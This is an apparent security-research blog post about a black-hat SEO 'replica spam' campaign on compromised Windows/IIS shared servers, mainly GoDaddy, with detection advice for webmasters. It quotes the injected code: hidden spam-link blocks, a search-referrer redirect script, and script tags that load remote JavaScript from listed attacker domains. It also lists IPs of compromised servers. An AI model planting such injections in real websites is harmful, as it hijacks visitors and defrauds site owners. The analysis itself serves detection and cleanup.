0 SHARES Facebook Twitter

While doing an analysis of one black-hat SEO doorway on a hacked site, I noticed that it linked to many similar doorways on other websites, and all those websites were on IIS servers. When I see these patterns, I try to dig deeper and figure out what else those websites have in common. This time I revealed quite a few GoDaddy Windows servers have been pwned by “replica spam” hackers.

Let’s Dig Into Some Numbers

1,782 Domains. I collected 1,782 unique compromised domains that hackers use in this campaign. This list is just a tip of an iceberg and I’ll show why a bit later, so read on.

305 IP Addresses. Those websites are scattered across 305 unique IP addresses (actually 304, if we ignore four domains whose addresses I couldn’t resolve). This means roughly 6 websites per IP, however they are not evenly distributed and while many IPs only have one compromised site, some of the servers have hundreds of them.

Top networks:

GoDaddy : 95 hosts (31%) and 1,095 websites ( 61%. )

: 95 hosts (31%) and 1,095 websites ( 61%. ) Brinkster : 50 hosts (16%) and 258 websites (14%)

: 50 hosts (16%) and 258 websites (14%) Network Solutions : 27 hosts (9%) and 77 websites (4%)

: 27 hosts (9%) and 77 websites (4%) Versaweb LLC: 5 hosts (1.6%) and 88 websites (5%)

As you can see, 84% of all websites belong to 4 networks.

Let’s look closer at servers on these networks, but before we do it I’ll show how I find compromised websites.

Cyber Monday Spam

The spam campaign I’m investigating is promoting online stores that sell cheap “replicas” of popular luxury brands like Beats by Dre, Michael Kors, Lululemon, Uggs, Juicy Couture, Moncler, Ray Ban, etc. Most of the doorways are currently optimized for Black Friday and Cyber Monday deals. The typical anchor text they use in their links is something like “michael kors cyber monday” or “uggs black friday“.

These spammy links point to the homepage of compromised websites, which typically have a block of hidden links at the bottom of HTML code:

<div style="position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10;"> ... 30-400 spammy links here ... </div>

If the website is vulnerable enough, hackers will install a script that generates completely new spammy pages specifically for search engines and return normal pages for human visitors — cloaking. The “human” versions of the pages have a small script at the very top of the HTML (usually before the tag) that redirects web searchers to spammy sites. It either something like this:

<script> var s=document.referrer; if(s.indexOf("google")>0 || s.indexOf("bing")>0 || s.indexOf("aol")>0 || s.indexOf("yahoo")>0) { self.location='hxxp://www .jackets pretty .com'; //just one of many domains they use }</script>

or a similar script, loaded from the spammers’ own server:

<script src="hxxp://nofie.talkmes . com/c/nofie.js" type="text/javascript"></script>

At this point they use the following script URLs:

hxxp://bats . solorule . com/d/bats.js hxxp://bats . solorule . com/c/bats.js hxxp://cancher . iamsanver . com/a/cancher.js hxxp://cancher . letgopub . com/c/cancher.js hxxp://cancher . sanonsport . com/d/cancher.js hxxp://luover . unbangs . com/c/luover.js hxxp://meika . ruvipshop . com/a/meika.js hxxp://meika . sportruns . com/d/meika.js hxxp://meika . ruvipshop . com/a/meika.js hxxp://meika . ukingfans . com/c/meika.js hxxp://nofie . godalice . com/d/cagode.js hxxp://nofie . godalice . com/kspe.js hxxp://nofie . rockenice . com/a/cagode.js hxxp://nofie . rockenice . com/a/nofie.js hxxp://nofie . talkmes . com/c/nofie.js hxxp://ungogo . godleders . com/a/ungogo.js hxxp://ungogo . leftgod . com/c/ungogo.js hxxp://ungogo . leftgod . com/c/ungogo.js hxxp://ungogo . nightleder . com/d/ungogo.js hxxp://js . xufengonline . com/js/zong.js hxxp://www . monclerslocker . com/js/style.js

Most of them are on the 173.252.207.166 IP (Take 2 Hosting Inc).

Detection

Any of these variants are easily detected by both Sucuri SiteCheck and Unmask Parasites, so it’s not a problem to check websites and tell whether they are infected or not.

Now that we know how to detect the infection, let’s just test random websites on some of the IPs that have many infected websites (based on my doorway analysis).

For example, let’s take 184.168.152.150 (where I found 25 doorways) and use the Bing’s “ip:” search operator along with the “cyber monday” keyword to find websites on that server: http://www.bing.com/search?q=ip%3A184.168.152.150+cyber+monday. Now you can scan websites for results that point to home pages (/ or index.html). More than 70% of the websites I checked are still infected (the rest either won’t load or have been cleaned already).

Compromised Servers

This simple Bing search revealed hundreds of infected websites on that server. I observed the same results for 49 out of 95 GoDaddy servers from my list.

184.168.152.149

184.168.152.150

184.168.152.151

184.168.152.3

184.168.27.116

184.168.27.204

184.168.27.205

184.168.27.206

184.168.27.32

184.168.27.33

184.168.27.34

184.168.27.35

184.168.27.36

184.168.27.37

184.168.27.39

184.168.27.40

184.168.27.41

184.168.27.44

184.168.27.46

184.168.27.47

184.168.27.81

184.168.27.82

184.168.27.83

184.168.46.17

184.168.46.18

184.168.46.74

50.63.196.33

50.63.196.34

50.63.196.35

50.63.196.47

50.63.197.10

50.63.197.12

50.63.197.13

50.63.197.139

50.63.197.140

50.63.197.141

50.63.197.142

50.63.197.144

50.63.197.145

50.63.197.203

50.63.197.206

50.63.197.207

50.63.197.208

50.63.197.6

50.63.197.7

50.63.197.8

50.63.197.9

50.63.202.26

97.74.215.156

Those 49 servers are shared Windows servers with thousands of sites. For example, Domaintools.com says 2,050 sites use the 184.168.152.150 address. The websites I checked belong to different users so it’s not just a matter of individual compromised accounts. And the websites are quite heterogeneous – ASP, PHP, pure HTML, etc. so it doesn’t look like a common web application vulnerability either. It looks like those servers have been pwned by hackers who now have access to most user accounts there. Given that we have almost 50 known such Windows servers on the GoDaddy network, this may mean some infrastructure level problems or at least common Windows server security configuration issues.

The rest of the servers typically have one or very few websites (I suppose either dedicated servers or IPs) so they don’t affect this hypothesis.

Some of the Brinkster and Versaweb servers also have this issue:



65.182.100.172

65.182.100.177

65.182.100.186

65.182.100.191

65.182.100.88

65.182.101.106

65.182.101.150

65.182.101.152

65.182.101.206

65.182.101.207

65.182.101.41

65.182.101.60

76.164.226.242

76.164.226.243

76.164.226.244

76.164.226.245

76.164.226.246

It’s still not clear why all websites on those servers have not been infected (or have they been cleaned already?). Maybe hackers infected them semi-manually, so just a few hundred infected websites was good enough for them?

When checking random websites on the compromised servers I noticed that some of them used very old versions of CMS’s (e.g. 4 year old WordPress). Maybe such websites were the penetration points that helped hackers compromise the whole servers later?

I also know that hackers install PHP wrapper scripts on pure HTML sites. For example, it’s typical to see a default.php working instead of index.html when you request a homepage. This wrapper script explains why you see the injected script at the very top of the HTML code and how hackers manage to implement “cloaking” on pure HTML sites.

At this point, I can only see the following things in common on the servers used in this spam campaign:

Windows

IIS (usually an old version)

PHP support

I wonder if this combination has a known security hole that allows to pwn server?

To Webmasters

This time I’d like to reach out to webmasters who host their websites on shared Windows servers. Especially to GoDaddy clients.

Please Check Your Websites ASAP!

You can start with free online scanners like Sucuri SiteCheck and Unmask Parasites,

Then check search results for your website on Google (the “site:” operator), where you should look for unexpected keywords in your page titles and descriptions. Make sure to check “cached” copies that Google store for your site. Then add the following keywords to your “site:” search that may help your spot more web spam:

site:yourdomain.com cheap

site:yourdomain.com buy online

site:yourdomain.com “cyber monday”

site:yourdomain.com “black friday”

site:yourdomain.com outlet

Then you might want to figure out if your server looks compromised. First, identify your website’s IP address. You can use commands like ping or host, you can enter your domain name on a website like whois.domaintools.com, or you can at least ask your hosting provider. With your IP, you can then use the Bing‘s “ip:” search along with some spammy keywords.

Here are a few searches that I suggest you can try:

ip:ip address cyber monday

ip:ip address black friday

ip:ip address ”beat by dre cheap”

ip:ip address ”Cheap Louis Vuitton”

ip:ip address viagra online

ip:ip address payday loans

ip:ip address “order cialis online”

If you see many results from different websites, you might want to ask your hosting provider what’s going on there, and if the server is really secure.

We are currently contacting hosting providers so they can address this issue…